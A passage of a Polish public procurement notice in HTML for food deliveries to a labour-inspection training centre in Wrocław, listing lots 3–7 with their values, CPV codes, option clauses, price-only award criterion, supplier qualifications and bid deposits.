się charakteryzować bieżącą przydatnością do spożycia oraz spełniać wymogi określone w opisie produktu wskazanym w załączniku nr 1 do umowy. <br/>3. Szczegółowe warunki realizacji przedmiotowego zamówienia zawiera projekt umowy wraz załącznikami, stanowiące integralną część SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 165664,32 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">03142500-3 - Jaja</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje możliwość skorzystania z prawa opcji, o którym mowa w art. 31 ust. 2 i art. 441 ust. 1 ustawy Pzp. Prawem opcji jest możliwość zwiększenia dostaw na warunkach zawartej umowy do 20% zamówienia podstawowego. W ramach opcjonalnych 20% Zamawiający zastrzega sobie możliwość zwiększenia dostaw artykułów spożywczych wymienionych w załączniku nr 1 lub zamówienia artykułów <br/>z danego asortymentu niewymienionych w formularzu asortymentowo-cenowym – przykładowe artykuły spożywcze dla każdej części zostały wymienione w załączniku nr 1. W przypadku zwiększenia ilości artykułów wymienionych w załączniku nr 1, wykonawca zobowiązany jest utrzymać ceny jednostkowe zamówienia opcjonalnego na poziomie cen jednostkowych zamówienia podstawowego. W przypadku artykułów niewymienionych w załączniku nr 1, wykonawca realizuje zamówienie po zaakceptowaniu ceny danego artykułu przez Zamawiającego. Prawo opcji jest uprawnieniem zamawiającego, z którego może, ale nie musi skorzystać w ramach realizacji umowy. W przypadku nie skorzystania przez zamawiającego z prawa opcji Wykonawcy nie przysługują żadne roszczenia z tego tytułu. Warunkiem uruchomienia prawa opcji jest oświadczenie woli zamawiającego wykonania zamówienia w ramach prawa opcji i złożenie odpowiedniego zamówienia częściowego wykraczającego poza dostawy artykułów spożywczych, stanowiących zamówienie podstawowe.<br/>UWAGA! Zmiany ceny brutto, o których mowa w ust. 1 paragrafu 5 projektu umowy, nie wpływają na wartość zamówienia z zakresu opcji, określoną w § 4 ust. 1 lit. b) projektu umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W postępowaniu Zamawiający zastosuje kryterium ceny</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest sukcesywna dostawa artykułów spożywczych dla Ośrodka Szkolenia PIP według 7 części: CZĘŚĆ 4 – Mięso i wędliny. Powyższy przedmiot zamówienia został wykazany i opisany w załączniku nr 1 do SWZ. <br/>2. W ramach przedmiotu zamówienia wykonawca zobowiązany jest do dostawy artykułów spożywczych do siedziby Zamawiającego we Wrocławiu przy ul. Mikołaja Kopernika 9.<br/>Wydawanie zakupionych artykułów odbywać się będzie w siedzibie Zamawiającego w godzinach od 6:00 do 12:00 tego samego lub następnego dnia po złożeniu zamówienia za pośrednictwem poczty elektronicznej (e-mail) lub telefonu. <br/>Zamawiający i Wykonawca mogą zgodnie zmienić termin i czas wydawania artykułów w przypadku konkretnych zamówień, w zależności od potrzeb i sytuacji nieprzewidzianych. <br/>Zamawiający będzie realizował zakup artykułów średnio dwa razy w tygodniu. Zamawiający zastrzega, że będzie także realizował zakupy w sytuacjach nieprzewidzianych (np. w soboty). <br/>Wszelkie koszty transportu, wyładunku, wydania towaru oraz jego ubezpieczenia na czas transportu do siedziby Zamawiającego ponosi Wykonawca. <br/> Dostarczone artykuły muszą się charakteryzować bieżącą przydatnością do spożycia oraz spełniać wymogi określone w opisie produktu wskazanym w załączniku nr 1 do umowy. <br/>3. Szczegółowe warunki realizacji przedmiotowego zamówienia zawiera projekt umowy wraz załącznikami, stanowiące integralną część SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 158690,40 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15100000-9 - Produkty zwierzęce, mięso i produkty mięsne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15110000-2 - Mięso</p> <p class="mb-0">15131130-5 - Wędliny</p> <p class="mb-0">15131000-5 - Konserwy i przetwory z mięsa</p> <p class="mb-0">15131310-1 - Pasztety</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje możliwość skorzystania z prawa opcji, o którym mowa w art. 31 ust. 2 i art. 441 ust. 1 ustawy Pzp. Prawem opcji jest możliwość zwiększenia dostaw na warunkach zawartej umowy do 20% zamówienia podstawowego. W ramach opcjonalnych 20% Zamawiający zastrzega sobie możliwość zwiększenia dostaw artykułów spożywczych wymienionych w załączniku nr 1 lub zamówienia artykułów <br/>z danego asortymentu niewymienionych w formularzu asortymentowo-cenowym – przykładowe artykuły spożywcze dla każdej części zostały wymienione w załączniku nr 1. W przypadku zwiększenia ilości artykułów wymienionych w załączniku nr 1, wykonawca zobowiązany jest utrzymać ceny jednostkowe zamówienia opcjonalnego na poziomie cen jednostkowych zamówienia podstawowego. W przypadku artykułów niewymienionych w załączniku nr 1, wykonawca realizuje zamówienie po zaakceptowaniu ceny danego artykułu przez Zamawiającego. Prawo opcji jest uprawnieniem zamawiającego, z którego może, ale nie musi skorzystać w ramach realizacji umowy. W przypadku nie skorzystania przez zamawiającego z prawa opcji Wykonawcy nie przysługują żadne roszczenia z tego tytułu. Warunkiem uruchomienia prawa opcji jest oświadczenie woli zamawiającego wykonania zamówienia w ramach prawa opcji i złożenie odpowiedniego zamówienia częściowego wykraczającego poza dostawy artykułów spożywczych, stanowiących zamówienie podstawowe.<br/>UWAGA! Zmiany ceny brutto, o których mowa w ust. 1 paragrafu 5 projektu umowy, nie wpływają na wartość zamówienia z zakresu opcji, określoną w § 4 ust. 1 lit. b) projektu umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W postępowaniu Zamawiający zastosuje kryterium ceny</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest sukcesywna dostawa artykułów spożywczych dla Ośrodka Szkolenia PIP według 7 części: CZĘŚĆ 5 – Ryby i przetwory rybne. Powyższy przedmiot zamówienia został wykazany i opisany w załączniku nr 1 do SWZ. <br/>2. W ramach przedmiotu zamówienia wykonawca zobowiązany jest do dostawy artykułów spożywczych do siedziby Zamawiającego we Wrocławiu przy ul. Mikołaja Kopernika 9. <br/>Wydawanie zakupionych artykułów odbywać się będzie w siedzibie Zamawiającego w godzinach od 6:00 do 12:00 tego samego lub następnego dnia po złożeniu zamówienia za pośrednictwem poczty elektronicznej (e-mail) lub telefonu. <br/>Zamawiający i Wykonawca mogą zgodnie zmienić termin i czas wydawania artykułów w przypadku konkretnych zamówień, w zależności od potrzeb i sytuacji nieprzewidzianych. <br/>Zamawiający będzie realizował zakup artykułów średnio dwa razy w tygodniu. Zamawiający zastrzega, że będzie także realizował zakupy w sytuacjach nieprzewidzianych (np. w soboty). <br/>Wszelkie koszty transportu, wyładunku, wydania towaru oraz jego ubezpieczenia na czas transportu do siedziby Zamawiającego ponosi Wykonawca. <br/>Dostarczone artykuły muszą się charakteryzować bieżącą przydatnością do spożycia oraz spełniać wymogi określone w opisie produktu wskazanym w załączniku nr 1 do umowy. <br/>3. Szczegółowe warunki realizacji przedmiotowego zamówienia zawiera projekt umowy wraz załącznikami, stanowiące integralną część SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 38176,80 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15211000-0 - Filety rybne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15240000-2 - Ryby puszkowane i pozostałe ryby konserwowane lub przetworzone</p> <p class="mb-0">15241400-3 - Tuńczyk puszkowany</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje możliwość skorzystania z prawa opcji, o którym mowa w art. 31 ust. 2 i art. 441 ust. 1 ustawy Pzp. Prawem opcji jest możliwość zwiększenia dostaw na warunkach zawartej umowy do 20% zamówienia podstawowego. W ramach opcjonalnych 20% Zamawiający zastrzega sobie możliwość zwiększenia dostaw artykułów spożywczych wymienionych w załączniku nr 1 lub zamówienia artykułów <br/>z danego asortymentu niewymienionych w formularzu asortymentowo-cenowym – przykładowe artykuły spożywcze dla każdej części zostały wymienione w załączniku nr 1. W przypadku zwiększenia ilości artykułów wymienionych w załączniku nr 1, wykonawca zobowiązany jest utrzymać ceny jednostkowe zamówienia opcjonalnego na poziomie cen jednostkowych zamówienia podstawowego. W przypadku artykułów niewymienionych w załączniku nr 1, wykonawca realizuje zamówienie po zaakceptowaniu ceny danego artykułu przez Zamawiającego. Prawo opcji jest uprawnieniem zamawiającego, z którego może, ale nie musi skorzystać w ramach realizacji umowy. W przypadku nie skorzystania przez zamawiającego z prawa opcji Wykonawcy nie przysługują żadne roszczenia z tego tytułu. Warunkiem uruchomienia prawa opcji jest oświadczenie woli zamawiającego wykonania zamówienia w ramach prawa opcji i złożenie odpowiedniego zamówienia częściowego wykraczającego poza dostawy artykułów spożywczych, stanowiących zamówienie podstawowe.<br/>UWAGA! Zmiany ceny brutto, o których mowa w ust. 1 paragrafu 5 projektu umowy, nie wpływają na wartość zamówienia z zakresu opcji, określoną w § 4 ust. 1 lit. b) projektu umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W postępowaniu Zamawiający zastosuje kryterium ceny</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest sukcesywna dostawa artykułów spożywczych dla Ośrodka Szkolenia PIP według 7 części: CZĘŚĆ 6 – Pieczywo, świeże wyroby piekarskie i ciastkarskie. Powyższy przedmiot zamówienia został wykazany i opisany w załączniku nr 1 do SWZ. <br/>2. W ramach przedmiotu zamówienia wykonawca zobowiązany jest do dostawy artykułów spożywczych do siedziby Zamawiającego we Wrocławiu przy ul. Mikołaja Kopernika 9. <br/> Wydawanie zakupionych artykułów odbywać się będzie w siedzibie Zamawiającego w godzinach od 6:00 do 12:00 tego samego lub następnego dnia po złożeniu zamówienia za pośrednictwem poczty elektronicznej (e-mail) lub telefonu.<br/>  Zamawiający i Wykonawca mogą zgodnie zmienić termin i czas wydawania artykułów w przypadku konkretnych zamówień, w zależności od potrzeb i sytuacji nieprzewidzianych. <br/> Zamawiający będzie realizował zakup artykułów średnio dwa razy w tygodniu. Zamawiający zastrzega, że będzie także realizował zakupy w sytuacjach nieprzewidzianych (np. w soboty). <br/> Wszelkie koszty transportu, wyładunku, wydania towaru oraz jego ubezpieczenia na czas transportu do siedziby Zamawiającego ponosi Wykonawca. <br/> Dostarczone artykuły muszą się charakteryzować bieżącą przydatnością do spożycia oraz spełniać wymogi określone w opisie produktu wskazanym w załączniku nr 1 do umowy. <br/>3. Szczegółowe warunki realizacji przedmiotowego zamówienia zawiera projekt umowy wraz załącznikami, stanowiące integralną część SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 15430,20 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15811100-7 - Chleb</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15810000-9 - Pieczywo, świeże wyroby piekarskie i ciastkarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje możliwość skorzystania z prawa opcji, o którym mowa w art. 31 ust. 2 i art. 441 ust. 1 ustawy Pzp. Prawem opcji jest możliwość zwiększenia dostaw na warunkach zawartej umowy do 20% zamówienia podstawowego. W ramach opcjonalnych 20% Zamawiający zastrzega sobie możliwość zwiększenia dostaw artykułów spożywczych wymienionych w załączniku nr 1 lub zamówienia artykułów <br/>z danego asortymentu niewymienionych w formularzu asortymentowo-cenowym – przykładowe artykuły spożywcze dla każdej części zostały wymienione w załączniku nr 1. W przypadku zwiększenia ilości artykułów wymienionych w załączniku nr 1, wykonawca zobowiązany jest utrzymać ceny jednostkowe zamówienia opcjonalnego na poziomie cen jednostkowych zamówienia podstawowego. W przypadku artykułów niewymienionych w załączniku nr 1, wykonawca realizuje zamówienie po zaakceptowaniu ceny danego artykułu przez Zamawiającego. Prawo opcji jest uprawnieniem zamawiającego, z którego może, ale nie musi skorzystać w ramach realizacji umowy. W przypadku nie skorzystania przez zamawiającego z prawa opcji Wykonawcy nie przysługują żadne roszczenia z tego tytułu. Warunkiem uruchomienia prawa opcji jest oświadczenie woli zamawiającego wykonania zamówienia w ramach prawa opcji i złożenie odpowiedniego zamówienia częściowego wykraczającego poza dostawy artykułów spożywczych, stanowiących zamówienie podstawowe.<br/>UWAGA! Zmiany ceny brutto, o których mowa w ust. 1 paragrafu 5 projektu umowy, nie wpływają na wartość zamówienia z zakresu opcji, określoną w § 4 ust. 1 lit. b) projektu umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W postępowaniu Zamawiający zastosuje kryterium ceny</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest sukcesywna dostawa artykułów spożywczych dla Ośrodka Szkolenia PIP według 7 części: CZĘŚĆ 7 – Owoce i warzywa. Powyższy przedmiot zamówienia został wykazany i opisany w załączniku nr 1 do SWZ. <br/>2. W ramach przedmiotu zamówienia wykonawca zobowiązany jest do dostawy artykułów spożywczych do siedziby Zamawiającego we Wrocławiu przy ul. Mikołaja Kopernika 9. <br/>Wydawanie zakupionych artykułów odbywać się będzie w siedzibie Zamawiającego w godzinach od 6:00 do 12:00 tego samego lub następnego dnia po złożeniu zamówienia za pośrednictwem poczty elektronicznej (e-mail) lub telefonu. <br/>Zamawiający i Wykonawca mogą zgodnie zmienić termin i czas wydawania artykułów w przypadku konkretnych zamówień, w zależności od potrzeb i sytuacji nieprzewidzianych. <br/>Zamawiający będzie realizował zakup artykułów średnio dwa razy w tygodniu. Zamawiający zastrzega, że będzie także realizował zakupy w sytuacjach nieprzewidzianych (np. w soboty). <br/>Wszelkie koszty transportu, wyładunku, wydania towaru oraz jego ubezpieczenia na czas transportu do siedziby Zamawiającego ponosi Wykonawca.<br/>Dostarczone artykuły muszą się charakteryzować bieżącą przydatnością do spożycia oraz spełniać wymogi określone w opisie produktu wskazanym w załączniku nr 1 do umowy. <br/>3. Szczegółowe warunki realizacji przedmiotowego zamówienia zawiera projekt umowy wraz załącznikami, stanowiące integralną część SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 141799,20 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03221000-6 - Warzywa</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">03222321-9 - Jabłka</p> <p class="mb-0">03222322-6 - Gruszki</p> <p class="mb-0">03222200-5 - Owoce cytrusowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje możliwość skorzystania z prawa opcji, o którym mowa w art. 31 ust. 2 i art. 441 ust. 1 ustawy Pzp. Prawem opcji jest możliwość zwiększenia dostaw na warunkach zawartej umowy do 20% zamówienia podstawowego. W ramach opcjonalnych 20% Zamawiający zastrzega sobie możliwość zwiększenia dostaw artykułów spożywczych wymienionych w załączniku nr 1 lub zamówienia artykułów <br/>z danego asortymentu niewymienionych w formularzu asortymentowo-cenowym – przykładowe artykuły spożywcze dla każdej części zostały wymienione w załączniku nr 1. W przypadku zwiększenia ilości artykułów wymienionych w załączniku nr 1, wykonawca zobowiązany jest utrzymać ceny jednostkowe zamówienia opcjonalnego na poziomie cen jednostkowych zamówienia podstawowego. W przypadku artykułów niewymienionych w załączniku nr 1, wykonawca realizuje zamówienie po zaakceptowaniu ceny danego artykułu przez Zamawiającego. Prawo opcji jest uprawnieniem zamawiającego, z którego może, ale nie musi skorzystać w ramach realizacji umowy. W przypadku nie skorzystania przez zamawiającego z prawa opcji Wykonawcy nie przysługują żadne roszczenia z tego tytułu. Warunkiem uruchomienia prawa opcji jest oświadczenie woli zamawiającego wykonania zamówienia w ramach prawa opcji i złożenie odpowiedniego zamówienia częściowego wykraczającego poza dostawy artykułów spożywczych, stanowiących zamówienie podstawowe.<br/>UWAGA! Zmiany ceny brutto, o których mowa w ust. 1 paragrafu 5 projektu umowy, nie wpływają na wartość zamówienia z zakresu opcji, określoną w § 4 ust. 1 lit. b) projektu umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W postępowaniu Zamawiający zastosuje kryterium ceny</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający ustala warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej.<br/><br/>Wymagane jest, aby Wykonawca wykazał, że w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał (lub wykonuje) dostawy w ramach jednego kontraktu na dostawę artykułów spożywczych z asortymentu:<br/>1)	artykułów ogólnospożywczych o wartości kontraktu nie mniejszej niż 75.000,00 zł brutto – dla części 1;<br/>2)	artykułów mrożonych o wartości kontraktu nie mniejszej niż 35.000,00 zł brutto – dla części 2;<br/>3)	nabiału i jaj o wartości kontraktu nie mniejszej niż 80.000,00 zł brutto – dla części 3;<br/>4)	mięsa i wędlin o wartości kontraktu nie mniejszej niż 70.000,00 zł brutto – dla części 4;<br/>5)	ryb i przetworów rybnych o wartości kontraktu nie mniejszej niż 19.000,00 zł brutto – dla części 5;<br/>6)	pieczywa o wartości kontraktu nie mniejszej niż 7.000,00 zł brutto – dla części 6;<br/>7)	owoców i warzyw o wartości kontraktu nie mniejszej niż 70.000,00 zł brutto – dla części 7.<br/>Wykonawca nie może sumować wartości kilku umów o mniejszym zakresie dla uzyskania wymaganej wartości zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunku dot. zdolności technicznej lub zawodowej Wykonawca winien złożyć:<br/>wykaz dostaw (Załącznik nr 6 do SWZ), wykonanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów określających czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wypełniony „Formularz asortymentowo-cenowy” – zgodnie z załączonym wzorem, na podstawie którego sporządzony zostanie Załącznik nr 1 do umowy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Przystępując do postępowania Wykonawca, pod rygorem wykluczenia z postępowania, zobowiązany jest wnieść wadium w kwocie:<br/>dla części 1 – 1.900,00 zł;<br/>dla części 2 – 940,00 zł;<br/>dla części 3 – 2.070,00 zł;<br/>dla części 4 – 1.980,00 zł;<br/>dla części 5 – 470,00 zł;<br/>dla części 6 – 190,00 zł;<br/>dla części 7 – 1.770,00 zł;<br/>Razem: 9.320,00 zł<br/>Szczegółowe wymagania dot. wadium zostały wskazane w rozdziale XVI SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy ubiegający się wspólnie o udzielenie zamówienia (np. spółki cywilne, konsorcja), zgodnie z art. 58 ust. 2 ustawy Pzp, zobowiązani są ustanowić pełnomocnika. Z treści pełnomocnictwa winno jednoznacznie wynikać prawo pełnomocnika do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego w imieniu Wykonawcy. Dokument ten winien być<br/>opatrzony przez osobę/osoby uprawnioną(-e) do jego udzielenia tj. zgodnie z formą reprezentacji każdego z Wykonawców kwalifikowanym podpisem elektronicznym lub profilem zaufanym lub podpisem osobistym. W przypadku wspólników spółki cywilnej dopuszczalne jest przedłożenie umowy spółki cywilnej, z której wynika zakres i sposób reprezentacji, a w przypadku konsorcjum przedłożenie umowy konsorcjum. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. Spółka Cywilna, Konsorcjum), wykazanie braku podstaw do wykluczenia, o których mowa w punkcie 1 rozdziału XI SWZ musi wykazać każdy z Wykonawców. W przypadku Wykonawców wspólnie ubiegających się o udzielenie<br/>niniejszego zamówienia przez dwóch lub więcej Wykonawców, Zamawiający uzna za spełniony warunek zdolności technicznej i zawodowej jeżeli jego spełnienie wykaże jeden z Wykonawców składający ofertę wspólną. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> § 5 ust. 1. Zamawiający przewiduje, zgodnie z przesłankami art. 455 ust. 1 pkt 1 ustawy Prawo zamówień publicznych, możliwość zmiany ceny brutto w przypadkach określonych w art. 436 pkt 4 lit. b) ustawy Pzp, tj. w 